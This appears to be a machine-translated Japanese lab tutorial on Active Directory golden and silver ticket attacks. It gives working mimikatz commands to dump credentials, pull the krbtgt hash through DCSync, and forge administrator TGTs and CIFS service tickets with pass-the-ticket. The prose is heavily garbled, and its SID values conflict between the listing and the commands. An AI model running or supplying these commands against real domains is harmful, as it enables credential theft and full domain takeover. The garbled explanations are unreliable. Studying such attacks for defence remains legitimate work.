免責事項:この記事は技術は、ネットワークセキュリティの専門家と白い帽子を使用するためのもので記述し、直接に対処するために国家安全保障機関に提出して発見後、任意の個人または組織は、犯罪行為のテクノロジやツールの利用を広めてはいけません
維持するためのパーミッション
ゴールドノート
Ms14068の脆弱性の原則は、ドメイン管TGTを偽造し、法案の原則の脆弱性は、ユーザーの許可を得て、チケットを発行してユーザーコントロールを管理するために使用された偽造金のkrbtgtユーザーの法案、KRBTGTユーザードメインである、ことができます偽のシステム任意のユーザ
- 条件黄金のチケット要件:
-
1.ドメイン名hacker.com
2.ドメインSID値-1-5-21-1854149318-4101476522-1845767379 S
KRBTGTアカウントのNTLMパスワードハッシュ3.ドメインまたはAES-256値
0028977ae726d766b150520dc63df9b4
4.偽のユーザ名の管理者
NTLMパスワードは、ドメインユーザーのkrbtgtの抽出をハッシュ
lsadump::dcsync /domain:hacker.com /user:krbtgt
偽造管理者ユーザー
kerberos::golden /admin:administrator /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /krbtgt:ce420fcea94d02d7051ebfb82833edf7 /ptt
シルバーノート
銀法案は偽造ST(チケット)である一方、法案の原理にシルバーとゴールドms14068法案は、同じ、ms14068金ノートがある偽造TGT(チケット発行されたチケット)ではありません、この利点は、KDC後にチケットがないので、より多くのなどCIFS(ファイル共有サービス)、MSSQL、WinRMの(Windowsリモート管理)、DNS、としてのみのサービスの仕事の一部に隠された、しかし、偽造チケット、
- 条件銀ノートの要件
-
1.ドメイン
hacker.com
2.ドメインSID
S-1-5-21-1854149318-4101476522-1845767379
3.ターゲットサーバFQDN
dc.hacker.com
4.利用可能なサービス
CIFS
5.サービスNTML HASHアカウント
52c74fc45feba971209be6f2bc068814
。6。必要性の偽のユーザー名の
テスト
ドメインコントローラマシンのハッシュを取得
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt
シルバー偽札
kerberos::golden /domain:hacker.com /sid:S-1-5-21-1836192064-1636381992-1218642615 /target:dc.hacker.com /service:cifs /rc4:031091bab05b768b471a7060b6d1bbf1 /user:test /ptt
実験環境:
- Windows Serverの2012 R2 x64の(ドメインコントローラマシン)
- Windows 7のx64のSP1の(ドメイン・ユーザー・マシン)
- pfSense(ルーティング)
ms14068
構築するための具体的な方法を参照してください3万言葉のネットワーク詳細な展開のチュートリアルを構築するために企業内のドメイン制御環境を
シミュレーション:
ゴールド偽札
情報収集
ipconfig /all
ドメイン名を取得する
whoami /all
SIDを取得するには
NTLMパスワードハッシュのkrbtgtユーザーを取得するためにmimikatzソフトウェアを使用して
入力klist purge
、削除、チケットには
偽のチケット
mimikatz偽造ソフトウェア文の管理者ユーザを使用してチケットを実行してから終了するには、収集した情報を交換します
成功したドメインコントローラを持って
法案と拒否されたアクセス権を削除します
シルバー偽札
情報収集
ipconfig /all
ドメインコントローラのIP取得
の入力をping -a 10.1.1.1
完全ドメイン名を取得するためにdc.kacker.com
whoami /all
SIDを取得するには
、輸出にドメインコントローラのマシンハッシュを
偽のチケット
収集された情報は、実行文mimikatzソフトウェア偽造チケットを交換するために使用され、あなたが訪問することができます